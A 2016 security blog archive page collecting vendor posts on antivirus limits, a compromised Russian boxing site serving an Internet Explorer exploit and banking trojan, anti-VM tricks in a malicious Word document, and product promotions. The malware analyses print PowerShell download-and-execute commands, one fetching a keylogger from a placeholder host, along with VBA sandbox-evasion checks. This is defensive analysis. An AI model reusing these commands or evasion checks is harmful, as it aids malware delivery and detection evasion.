Monthly Archives: September 2016

  • 0

Antivirus Isn’t Dead, But It’s No Panacea

Category : Check Point

It should come as no surprise that antivirus solutions on their own are not equipped to deal with many of the threats we see today. Norton Antivirus stated as much back in 2014 when it famously declared, “Antivirus is dead.” The claim was not an indication that such products would be discontinued, but more an admission that protections need to evolve to keep up with increasingly sophisticated threats. A Norton representative asserted that traditional antivirus detected only 45% of all attacks. Even by 2014 standards, that figure seems optimistic. Today, more conservative estimates put the number at somewhere between 20-40%.

Despite antivirus being deployed globally on virtually every endpoint, breaches are still on the rise. Detecting and preventing malicious activity remains vital, but many of the sophisticated attacks we see today can penetrate PCs despite the presence of up to date antivirus solutions. Antivirus’s roots go back to 1987. It’s based on binary signatures i.e. hashes used to identify specific files. Signatures have become less effective over time as modern threats are able to constantly evolve to evade such detections.

If antivirus is no longer effective against many of today’s threats, why is it still the first line of defense for most organizations? One reason is due to the nature of regulatory, governance and compliance regulations, which mandate its use. Antivirus products have also evolved over time to include features such as heuristics, or the ability to identify threats which have no matching signature, but are similar to ones that do. Unfortunately, these have a very high false positive rate, and result in bloated installations that consume unnecessary hard drive space and CPU cycles. Vendors have also built portfolios of security solutions that rely on the installation of their own antivirus product, resulting in a form of lock-in for customers.

The prevailing reliance on antivirus protection results in a number of security issues which need to be addressed. Regulatory compliance alone doesn’t guarantee a network is adequately secured. Organizations may be PCI-DSS or HIPAA compliant, yet still need to seek additional controls to mitigate any remaining gaps in the security net. Additionally, as the amount of time and resources taken up by modern antivirus scans has climbed steadily over the years, vendors now allow users to skip or postpone scans. This essentially cancels the basic protection offered by these solutions. Users have also been lulled into believing that network security is only the responsibility of specific teams within an organization. The truth is that we all have a part to play.

If organizations are serious about addressing their security gaps, a number of steps need to be taken. While malware itself is a problem, understanding how it reaches your network is equally important. Most malware is delivered by exploits, programming bugs or vulnerabilities that let an attacker take control over your machine. Preventing these exploits is key to ramping up security efficacy, as is the ability to protect against unknown threats.

First and foremost, users must be educated to never open any attachments or click a link from a source that they can’t absolutely verify. Many seemingly innocent or legitimate-appearing entities turn out not to be so innocent after all. The best protection is to not allow an attacker an “in” to your system in the first place.

Once inside your system, an attacker can use any number of freely available tools to change the hash of a file, rendering your signature-based protections ineffective. Cloud services can then allow files to be uploaded, having first confirmed if antivirus vendors still identify a file as malicious.

Obviously, solutions that look at other indicators such as behavior and traffic patterns are needed. They should lean towards preventing attacks as a first course of action, with detection supplementing those cases which manage to slip through the gaps. Such protection is needed everywhere: endpoints, mobile devices, data centers, cloud, even IoT devices and SCADA.

So how can organizations move forward and focus on what really matters? Antivirus solutions are largely commoditized; they all work more or less the same way and achieve similar results. It doesn’t make a lot of sense to incorporate modern security controls based on how well they integrate with older, less effective products. Wipe the slate clean and evaluate which solutions provide the best protection, then come back and slot antivirus into the mix. By the same token, the main focus should not be on how much installation space is required by modern solutions or even how much CPU or memory they utilize. Newer products offer far greater protection than traditional controls, and such questions do not provide an apples-to-apples comparison.

Antivirus does have its place in network security. It’s a quick and efficient method of identifying known threats, thereby reducing the amount of processing required by more advanced protections. As part of a multi-layered security strategy, antivirus still makes a lot of sense. What’s often needed is for organizations to break out of the mentality of “that’s how we’ve always done things” i.e. relying solely on antivirus, and prioritize solutions that will offer the greatest protection.

  • 0

Highly Evasive Code Injection Awaits User Interaction Before Delivering Malware

Category : Forcepoint

On September 27, 2016 Forcepoint Security Labs noticed that the Russian boxing site allboxing[.]ru was compromised. The site is injected with code that attempts to silently redirect users to a third party website containing an exploit and a Russian banking trojan. The injected code employs several evasion tactics, and ensures that the redirect only occurs when there is significant user interaction on the website.

Hiding in Plain Sight

The site allboxing[.]ru is a very popular Russian boxing website receiving an estimated 3 million visitors per month.

One of the scripts being used by the website at hxxp://allboxing[.]ru/misc/jquery.once.js?v=1.2 has been modified to include additional code. The code claims to be loading a jQuery plugin called “jQuery Animate Plugin v1.2” but this is in fact a fake plugin inserted by the attacker.

Once of the giveaways here is that the URL reference for the plugin links to “”, whereas legitimate plugins will usually reference the project name directly such as “”. Nevertheless, the attacker has made significant effort to blend in with the legitimate content by using the same formatting and comment style.

The modified jquery.once.js script loads a second script from /misc/jquery.animate.js which in turn attempts to insert a script from the attacker’s own website. The script is not inserted if the user’s browser is either Chrome or Opera, presumably because the attacker is not able to exploit these browsers.

The automate.js script on getcanvas[.]org then waits for user interaction before inserting an iFrame to an exploit.

The script ensures that sufficient user interaction has occurred from either clicking, scrolling or moving the mouse. The attacker has given different weighting scores to the different types of user interaction and will only insert the iFrame once the threshold score is above 30. This is a stealth tactic used to prevent automated analysis systems from being redirected to the exploit. The technique was first documented back in 2014 in a similar infection chain.

Another stealth tactic employed here is the domain name and URL path which has been used. The term “canvas” is a well known boxing term and the URL contains the word “sport”. This makes the URL appear a lot less suspicious considering that allboxing[.]ru is a boxing news site.

Exploiting Internet Explorer

The malicious iFrame inserted by the attacker was located at hxxp://getcanvas[.]org/sport/page/5.html. The page contains a VBScript exploit that leverages CVE-2016-0189 and attempts to run a Powershell script on the machine.

The Powershell script decodes to the following:

(New-Object System.Net.WebClient).DownloadFile("","islzma32.exe");(New-Object -com Shell.Application).ShellExecute("islzma32.exe");

The script downloads and executes tysonfury.jpg which is a variant of the Buhtrap Russian banking trojan. The SHA1 of the sample we received is b74f71560e48488d2153ae2fb51207a0ac206e2b.

Protection Statement

Forcepoint™ customers are protected against this threat via TRITON® ACE at the following stages of attack:

  • Stage 2 (Lure) – The fake jQuery plugin is identified and blocked.
  • Stage 3 (Redirect) – The attempt to insert a malicious iFrame onto the page is blocked.
  • Stage 4 (Exploit) – The CVE-2016-0189 exploit is identified and blocked.
  • Stage 5 (Dropper) – The Buhtrap malware is prevented from being downloaded.
  • Stage 6 (Call Home) – Attempts by the Buhtrap variant to call home are identified and blocked.


Attackers are getting better at disguising the code they inject into compromised websites. Websites with high volumes of traffic are a popular choice for attackers, and this is especially true if the bulk of the traffic is from a specific region of the world of interest to the attacker. With the recent arrests of actors using the Lurk banking trojan, Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software.

Indicators of Compromise

Compromised Website


Exploit Sites

Buhtrap Sample (SHA1)


Buhtrap Command-and-Control Server

  • 0

Vendetta Brothers, Inc. – A Window Into the Business of the Cybercriminal Underground

Category : FireEye

FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the “Vendetta Brothers.” This enterprising duo uses various strategies to compromise point-of-sale systems, steal payment card information and sell it on
their underground marketplace “Vendetta World.”

The Vendetta Brothers – who we believe operate from Spain and Eastern Europe – have been observed using everything from phishing to installing physical skimmers to steal payment card data, and their targets have mostly been located in the U.S. and Nordic countries.

Our latest report shines light on the Vendetta Brothers’ tactics, techniques and procedures, which involve the use of practices more commonly seen
in legitimate business, including outsourcing, partnerships, diversifying their market, and insulating liability.

We expect to see other cybercriminal groups using these more advanced techniques as a way of scaling their operations and increasing profits, all while mitigating risk and potentially frustrating investigators.

Download the report to learn more about the Vendetta Brothers.

  • 0

Your Security Systems Need to be Secure

Category : Cyber-Ark

According to a variety of industry reports, cyber security spending is measured in Billions of dollars, and it’s projected to grow – driven by a number of market factors including cloud, mobile, IoT and other “elements of digital business.”

But as organizations move quickly to shore up their security systems, motivated attackers continue to innovate and evolve their tactics just as rapidly. From sophisticated phishing attacks, software flaws and reverse-engineering, to protocol analysis, misuse of cryptography, side-channel attacks and even attacks on physical security measures, attackers often have little trouble getting into an organization’s network. Remember – attackers are patient – always looking for a crack to enter enterprise networks.

This is one reason why layered security is critical – ideally including proactive controls such as encryption and detection systems to identify malicious behavior. Yet security systems can be largely ineffective without privileged account security in place as a safeguard.

Think of it this way: privileged accounts are embedded within every piece of security, database and network technology – used for installation and management. As such, they represent a gateway into your organization’s most valuable assets. If you deploy a million dollars’ worth of next-gen firewalls but don’t secure their privileged accounts, an attacker can obtain those credentials and go right through your firewall. Attackers are experts in spotting “cracks,” including small vulnerabilities that only exist for a few hours. Even the smallest “crack” of one stolen credential can be enough to make your million-dollar firewall investment nearly worthless—or worse, take down your entire organization.

Today’s reality is that the IT infrastructure is not fully protected unless privileged accounts and their credentials (accessed by both humans AND applications) are secured.

To maintain the credibility and efficacy of your security solutions, put privileged account security in place before you deploy any other security controls or detection solutions. For other reasons to prioritize privileged account security today, download our new At-a-Glance Guide.

  • 0

Shift Left! Accelerate continuous testing with HPE Service Virtualization

Category : Uncategorized

See how GameStop shift left in software app lifecycle from development to functional and performance tests. HPE Service Virtualization speeds up continuous testing and integration through simulation of internal and/or third party components needed.

  • 0

Anti VM Tricks

Category : Sentinel One

The Sample

Recently, I was tasked with investigating a malware sample which sometimes failed to behave maliciously. Unlike normal people, I spend a lot of time trying to run malware and it can be surprisingly difficult to get it to behave like it should. Any number of things can go wrong which can lead to the malware simply crashing or not doing anything at all. In this post, I’ll discuss some clever anti vm tricks observed in a malicious Word document.

The sample’s original name is “Intelligent Software Solutions Inc.doc” and the sha256 hash is 048fc07fb94a74990d2d2b8e92c099f3f986af185c32d74c857b07f7fcce7f8e. Additional related samples can be found by searching VirusTotal for "vbaproject.bin" "activeX1.bin" type:docx.

Here’s how the document looks when opened in Word:
anti vm tricks word view

If that didn’t look suspicious enough, here’s a view of the code:
anti vm tricks vb code

This is textbook Word malware. It has no real content, includes executable code (active content), and the code is obfuscated and sketchy looking.


I first looked at the code and noticed this subroutine near the top: InkPicture1_Painted(ByVal DQkDFU As Long, ByVal KPhPosT As IInkRectangle). This looked like the execute entry point and was probably executed as soon as the “Enable Content” button was clicked and every time ActiveX control was rendered (i.e. painted) by Word. All it does is call IuIxpP and swallow any and all errors that are raised.

Trick #1

The IuIxpP sub calls two methods, DKTxHE and qrNjY and raises an error if either one returns true. The first, DKTxHE is deviously simple:

Public Function DKTxHE() As Boolean
DKTxHE = RecentFiles.Count < 3
End Function

The RecentFiles object gives access to the history of recent documents. Most users, unless they just installed Word, are going to have opened more than two documents. However, on a testing virtual machine (VM), the software is normally not “broken in”. When the VM is initially created, software is installed, maybe opened once or twice to make sure it works, and then the state is saved and every time a test needs to be made, that state is loaded again. These VM images may then be used in automated analysis and testing tools which execute malware and see how they behave. If malware can be smart enough to know when it’s being tested in a VM, it can avoid doing anything suspicious or malicious and thereby increase the time it takes to be detected by such tools.

Trick #2

The second sub, qrNjY, also tries to detect if it’s in a VM by getting information about the IP address. It makes a request to which normally requires some kind of authentication or API key. To get around this requirement, the malware makes the request look as if it’s coming from the site itself by setting the HTTP Referrer to and User-Agent to Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0). This bypass only allows one to retrieve the information about the requesting address, which has limited uses.

The response is in JSON and contains information such as the country, city, and, most importantly, the organization associated with the IP address. For example:

  "location": {
    "latitude": 30.7858,
    "longitude": -102.1232,
    "metro_code": 705,
    "accuracy_radius": 5,
    "time_zone": "America/Los_Angeles"
  "continent": {
    "names": {
      "ja": "北アメリカ",
      "pt-BR": "América do Norte",
      "de": "Nordamerika",
      "es": "Norteamérica",
      "ru": "Северная Америка",
      "fr": "Amérique du Nord",
      "zh-CN": "北美洲",
      "en": "North America"
    "code": "NA",
    "geoname_id": 6255149
  "city": {
    "names": {
      "pt-BR": "Oakland",
      "de": "Oakland",
      "es": "Oakland",
      "ja": "オークランド",
      "en": "Oakland",
      "ru": "Окленд",
      "fr": "Oakland",
      "zh-CN": "奥克兰"
    "geoname_id": 5378538
  "postal": {
    "code": "94619"
  "country": {
    "names": {
      "ru": "США",
      "fr": "États-Unis",
      "zh-CN": "美国",
      "en": "United States",
      "ja": "アメリカ合衆国",
      "es": "Estados Unidos",
      "pt-BR": "Estados Unidos",
      "de": "USA"
    "iso_code": "US",
    "geoname_id": 6252001
  "traits": {
    "organization": "Comcast Cable",
    "isp": "Comcast Cable",
    "ip_address": "",
    "autonomous_system_organization": "Comcast Cable Communications, LLC",
    "domain": "",
    "autonomous_system_number": 7922
  "registered_country": {
    "geoname_id": 6252001,
    "names": {
      "zh-CN": "美国",
      "ru": "США",
      "fr": "États-Unis",
      "en": "United States",
      "ja": "アメリカ合衆国",
      "pt-BR": "Estados Unidos",
      "de": "USA",
      "es": "Estados Unidos"
    "iso_code": "US"
  "subdivisions": [
      "geoname_id": 5332921,
      "names": {
        "ru": "Калифорния",
        "fr": "Californie",
        "zh-CN": "加利福尼亚州",
        "en": "California",
        "ja": "カリフォルニア州",
        "pt-BR": "Califórnia",
        "es": "California",
        "de": "Kalifornien"
      "iso_code": "CA"

In the example response, it’s known the IP address is associated with Comcast. After this request is made, several strings are decrypted and stored in an array. If any of the strings in the array are found to be in the JSON response, the code throws an error and code stops executing. Everything is converted to uppercase before doing any comparisons. The list of strings in the array, with fixed capitalization and sorted alphabetically:

Blue Coat
Data Center
ESET, Spol
Iron Port
Ovh Sas
Palo Alto
Strong Technologies
Trend Micro

After this list was obtained, it was clear the purpose of this sub is to check if the IP address is associated with any hosting or anti-virus companies which are likely to be hosting testing VMs.

After taking apart and understanding the two anti-sandbox / anti vm subroutines, I had a pretty good idea why we sometimes failed to detect this particular sample. To test my hypothesis, I created an empty Word document and copy pasted it twice to produce three documents with different names. Then, I opened each one and closed Word in order to populate the recent documents history. Finally, I opened the malware in question, enabled active content, and was immediately greeted with a satisfying “Threat Detected” popup and the near immediate termination of the malicious document. If I opened the malware without first creating a history of recent documents, the malware would fail to do anything malicious at all. Because it didn’t actually do anything bad, it wasn’t detected.

The Payload

Still somewhat curious about what the payload could be, I continued taking apart the sample to find that it executes some PowerShell:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://payload_site/admin/worddata.dat', $f);(New-Object -com WScript.Shell).Exec($f)

This script downloads http://payload_site/admin/worddata.dat which turned out to be a low level key logger. The sha256 hash for worddata.dat is 19d884d3b688abf8e284d3bc6a06817096d15592bcd73f85a0e4b79749f2a744.

anti vm tricks worddata anti vm tricks worddata 2

Related Works

Very closely related anti-vm / anti-sandbox techniques have been discussed by researchers at Proofpoint and by Deepen Desai at zscaler. Since these methods are appearing in different malware families, they seem to represent a new trend for VBA-based malware.


Testing malware is hard and there’s a lot that can go wrong, especially if you don’t rely merely on simple signatures but instead detect malicious behavior. For a fair evaluation of an AV product, any test must be done in such a way as to exercise the most malicious code and invoke realistic behaviors from the malware samples. This means selecting malware which is still “alive”, i.e. has command and control servers which are still up and functioning as well as configuring the test VM to seem like an actual user’s machine as much as possible. Both of these conditions are possible, but it’s easy to stuff a test set with malware samples which are either not valid executables or don’t behave maliciously and many tests are performed on freshly minted VM images with no user activity history, and running in the cloud which can be detected by interrogating IP address information. Selecting good samples and creating good VM images is possible, but it takes extra effort.

Not only does this sort of lazy evaluation skew detection results, but the skew is unrealistic. Signatures can easily detect executables that don’t run and can’t behave maliciously, but is that really what’s threatening your users? Real threats are the ones no one has seen yet or are very new and signatures haven’t been created. A fair test must necessarily include current and functional samples executed in a realistic environment.

  • 0

Prioritizing Application Optimization Efforts Based on Business Impact

Category : Riverbed

SteelCentral AppInternals provides a revolutionary way of prioritizing optimization efforts based on the business impact to your mission-critical applications.

Tuning without understanding the business impact is a lot like playing Whack-a-Mole. Traditional application tuning efforts often involve identifying the slowest code or SQL, optimizing that, identifying the next slowest code or SQL, optimizing that, and so on, and so on, and so on…, but without knowing the impact to the business, do you know that your efforts are the most impactful they could be? Are your efforts making a difference to your end users?

AppInternals’ Performance Graph presents performance data in a new way by showing logical relationships between transaction types and their associated sub-components. Performance Graph easily and visually shows component delay for every transaction type. In the graph below, we see the objects associated with each transaction type and quickly see where the application is spending its time. In this case, where we are not accounting for business impact, we might start our optimization efforts with the DX.EntryPoint.Main method.

If we weight the transaction types based on their importance to the business, our focus changes. In this example, we are working with a transportation application. Dispatching trucks is the most important function. If trucks do not roll, the company does not make money. Invoicing on the other hand, is important, but not as critical as dispatching trucks. If we assign a financial value to each transaction type, or a relative weight if we do not know the actual financial impact, our tuning focus changes.

After applying weights, we see without a doubt that TMWSystems…DoWork method is the most time consuming method based on what is most important to the application (i.e dispatching trucks). Tuning this will have a direct impact on critical application performance.

  • 0

Prepare your SOC for the Convergence of Advanced Threat Management and SIEM

Category : McAfee

Earn 1 CPE Credit for attending this live webcast

Wednesday, October 12, 2016
11:00am PT | 1:00pm CT | 2:00pm ET

Is your SOC prepared for this next-generation of security operations?

Learn from renowned cybersecurity expert Peter Stephenson and Michael Leland, SIEM Evangelist  from Intel Security, as they discuss why enterprises are now turning to advanced threat and incident management (ATIM) TTPs that integrate with their SIEM.

This continued shift from perimeter-focused, reactive approaches—to continuously monitored, collaborative and proactive methods, leverages analytics and crowdsourced threat feeds, and requires as much focus on the context as the incident.

Key takeaways will include:

  •  Use of shared technical data to automate out the noise and focus on the signal.
  •  How to define the effects of each step in the attack chain to apply effective defenses and respond quickly.
  •  Integrating technical data context and organizational data for enhanced understanding of what is happening in the environment


  • 0

Become a Risk Ninja

Category : HP Security

Master intelligent, adaptive security by attending a HPE Transformation Workshop. Led by HPE security experts, this an all-day, in-depth workshop designed for enterprise IT decision makers.

Thank you for your interest in the Protect Your Digital Enterprise Transformation Workshop. You and your team will spend the day with Hewlett Packard Enterprise experts, exchange information on your most pressing business issues, and receive a customized roadmap to help you plan a robust security transformation journey that supports your business goals.



  • 0

Gigamon and Splunk: Using Metadata to Improve Security Visibility

Category : Gigamon

Gigamon is looking forward to an exciting week at Splunk’s developers conference, .conf16: The 7th Annual Splunk Conference. For us, it’s all about the power of metadata to achieve actionable visibility so organizations can get better performance and intelligence from their security solutions.

Establishing reliable baselines and context for network activity is a daunting task. There are simply too many data sources belonging to too many different tools and solutions: endpoints, routers, switches, application servers (like DNS and Active Directory), existing security systems (like firewalls and intrusion prevention systems), and the list goes on. Even if it were possible to gather all the necessary data, there is simply too much of it to store and analyze easily. To make matters worse, turning on log-in systems, like firewalls and application servers, is computationally intensive.

How can organizations get access to the data that is so critical to proactive monitoring, detection and response efforts? And once they get it, how can they reduce the immense data volumes? To avoid overwhelming the monitoring infrastructure, the answer lies in retrieving a summary of relevant data using metadata elements found in Splunk® Enterprise with GigaSECURE Metadata Engine.

Sitting inside the GigaSECURE Security Delivery Platform is a full-blown Metadata Engine that provides useful security information about applications, devices, and users’ behaviors for each and every security tool connected to it. To solve the data deluge problem (which will only be exacerbated when speeds increase to 100G), organizations can simply turn on this function, feed the metadata into Splunk Enterprise, and gain greater understanding using the following capabilities.


Source: Splunk Enterprise dashboard screen

Using the Gigamon Metadata Engine, organizations have deeper SSL visibility. They can analyze all SSL certificates used in the organization, identify the issuing certificate authority and Web servers, and see additional details including expired certificates, self-signed certificates, and more. They can also detect suspicious certificates, their related servers tied to malicious sites, and which endpoints have visited those sites.


Organizations can also conduct DNS queries to see if an impacted device gained access to command and control functions. With the Metadata Engine, they can see the top DNS queries and responses as well as gain visibility to less common accessed DNS domain names and cross reference their reputation. For example, they might find a set of hosts regularly beaconing to their command and control server at regular intervals. Using Splunk Enterprise’s scripting language, they can programmatically search for such hosts at scheduled intervals and find compromised endpoints for further investigation and analysis.


Another capability involves monitoring URLs and response codes.  The Metadata Engine can parse out URLs from http streams and pass them to Splunk Enterprise. Analysts can perform a host of security checks starting with reputation analysis of URLs to see which webpages employees have visited whether for work related or personal use. They can determine which website breached their networks, gained access, and spread laterally.

Metadata analysis also detects irregularities by parsing response codes and looking for deviations from the normal (baseline) on a regular basis. An excessive increase in redirect codes such as the popular “302 redirect” may indicate a compromise of the organization’s servers, with the attacker directing traffic to an alternate server. A sudden increase in error codes such as “404 Page not found” may show a possible denial of service attack where the threat actor has caused the organization’s Web servers to be unreachable by browsers attempting to connect to them.


Many organizations already use Splunk software to centrally collect event and log data across their infrastructure. By integrating GigaSECURE Metadata Engine in combination with Splunk Enterprise, security organizations can leverage the rich metadata for improved threat analysis and intelligence.

Stop by our Gigamon booth # M12 at Splunk’s .conf2016 to learn more and read our recent white papers, Harnessing the Power of Metadata for Security and Nine Metadata Use Cases: How to Use Metadata to Make Data-Driven Decisions.

– See more at: